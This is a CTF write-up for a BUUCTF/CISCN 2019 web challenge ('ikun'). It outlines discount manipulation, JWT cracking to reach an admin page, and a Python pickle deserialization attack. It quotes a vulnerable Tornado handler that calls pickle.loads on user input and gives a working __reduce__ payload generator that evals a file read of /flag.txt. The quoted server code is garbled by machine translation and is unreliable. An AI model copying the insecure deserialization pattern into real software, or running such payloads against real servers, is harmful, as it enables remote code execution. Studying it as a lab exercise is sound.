BUUCTF | [CISCN2019 North Division Day1 Web2] ikun

step:

Find out lv6 purchase, modification discount buy lv6; then find admin login screen, JWT break, landing admin; click the button to become a large membership, use python read flag deserialization vulnerability

 

 

 

 

 

Resolution:

This question chefs of WP very detailed, I would record myself do not understand the point

pickle Import 
Import urllib 


class AdminHandler (BaseHandler): 
    @ tornado.web.authenticated 
    DEF GET (Self, * args, ** kwargs): 
        IF self.current_user == "ADMIN": 
            return self.render ( 'form.html', = RES 'This IS Black Technology!', Member = 0) 
        the else: 
            return self.render ( 'no_ass.html') 

    @ tornado.web.authenticated 
    DEF POST (Self, * args, ** kwargs): 
        the try: 
            Become = self.get_argument ( 'Become') 
            # the pickle provides a simple persistence function. Objects can be stored as a file on disk. 
            # #  
            # # Pickle module can only be used in python, almost all of the data types (lists, dictionaries, sets, etc.) can be used in the python pickle serializes
            # # 
            # # The pickle serialized data, poor readability, people are generally not recognized.
            The pickle.loads = P (urllib.unquote (Become)) 
            # urllib.unquote: the parameters stored in the dictionary to encode the URL query string, i.e. converted to key1 = value1 & key2 = value2 form 
            # pickle.loads (bytes_object ): byte read from the packaged objects, and returns the 
            return self.render ( 'form.html', RES = P, = Member. 1) 
        the except: 
            return self.render ( 'form.html', RES = 'This is Black Technology!', member = 0)

　　payload [become generated parameters to the environment at PY2]:

import pickle
import urllib

class payload(object):
    def __reduce__(self):
       return (eval, ("open('/flag.txt','r').read()",))
# __reduce__:当定义扩展类型时（也就是使用Python的C语言API实现的类型），如果你想pickle它们，你必须告诉Python如何pickle它们。
# __reduce__ 被定义之后，当对象被Pickle时就会被调用。
# 它要么返回一个代表全局名称的字符串，Pyhton会查找它并pickle，要么返回一个元组。
# 这个元组包含2到5个元素，其中包括：
#       一个可调用的对象，用于重建对象时调用；【我们这里的eval】
#       一个参数元素，供那个可调用对象使用； 【我们这里的open('/flag.txt','r').read()】
#       被传递给 __setstate__ 的状态（可选）；
#       一个产生被pickle的列表元素的迭代器（可选）；
#       一个产生被pickle的字典元素的迭代器（可选）
a = pickle.dumps(payload())
# pickle.dumps(obj)：以字节对象形式返回封装的对象，不需要写入文件中
a = urllib.quote(a)
print a

---

详细走链接：

https://www.zhaoj.in/read-5946.html

https://blog.csdn.net/weixin_43345082/article/details/97817909

https://blog.csdn.net/weixin_43411585/article/details/88854544

https://blog.csdn.net/wf592523813/article/details/79141463

https://www.cnblogs.com/lincappu/p/8296078.html

https://www.cnblogs.com/angelyan/p/11079267.html

https://www.jb51.net/article/135407.htm